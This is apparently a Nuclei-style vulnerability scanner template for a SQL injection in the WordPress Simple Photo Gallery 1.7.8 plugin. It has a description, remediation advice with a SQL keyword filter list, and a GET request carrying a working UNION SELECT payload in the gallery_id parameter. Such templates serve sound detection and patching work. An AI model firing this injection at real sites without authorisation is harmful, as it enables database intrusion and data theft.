id: Wordpess-wppg_photo_details_gallery_id-SQLi
info:
  name: Wordpess Simple Photo Gallery 1.7.8 -wppg_photo_details__gallery_id parameter sql injection vulnerability
  author:
  - l0ne1y
  description: |+
    WordPress Plugin Simple Photo Gallery ‘index.php’ SQL Injection Vulnerability
    WordPress is a blog platform developed by the WordPress Software Foundation using the PHP language. The platform supports the establishment of personal blog websites on PHP and MySQL servers. Simple Photo Gallery is one of the image gallery plug-ins.

    There is a SQL injection vulnerability in the WordPress Simple Photo Gallery plug-in. The vulnerability results from the program not adequately filtering the input submitted by the user before constructing the SQL query statement. An attacker could exploit this vulnerability to take control of the application, access or modify data, or exploit potential vulnerabilities in the underlying database. A vulnerability exists in version 1.7.8 of the WordPress Simple Photo Gallery plugin, and other versions may also be affected.

  reference:
  - https://www.exploit-db.com/exploits/37113/
  severity: high
  remediation: |-
    Official fix:
    1. It is recommended that users go to the official website to obtain the latest patches or the latest version of the program: https://wordpress.org/plugins/simple-photo-gallery/changelog/

    Temporary fix:
    1. Use precompiled statements. When using PDO, be careful not to splice variables directly into PDO statements. All query statements use the parameterized query interface provided by the database. Parameterized statements use parameters instead of embedding user input variables into the SQL statement. Almost all current database systems provide parameterized SQL statement execution interfaces. Using this interface can very effectively prevent SQL injection attacks.
    2. Escape or code the special characters (’”<>&*;, etc.) that enter the database.
    3. Confirm the type of each data. For example, numeric data must be numbers, and the storage fields in the database must correspond to int types.
    4. The data length should be strictly specified, which can prevent relatively long SQL injection statements from being executed correctly to a certain extent.
    5. The encoding of each data layer of the website is unified. It is recommended to use UTF-8 encoding for all data. Inconsistent encoding of the upper and lower layers may cause some filtering models to be bypassed.
    6. Strictly limit the database operation permissions of website users, and provide this user with permissions that are only sufficient for his or her work, thereby minimizing the harm of injection attacks to the database.
    7. Prevent the website from displaying SQL error messages, such as type errors, field mismatches, etc., to prevent attackers from using these error messages to make some judgments.
    8. Filter dangerous characters, for example: use regular expressions to match keywords such as union, sleep, and, select, load_file, etc. If a match is found, the operation will be terminated.
requests:
- matchers:
  - type: dsl
    condition: and
    dsl:
    - status_code==200
    - contains(body,"qvxpqvWkXcvyKumqpzqq")
  matchers-condition: and
  path:
  - '{{BaseURL}}/wppg_photogallery/wppg_photo_details/?gallery_id=1%20UNION%20ALL%20SELECT%20CONCAT(0x7176787071,0x76576b586376794b756d,0x71707a7171)--&image_id=1'
  method: GET
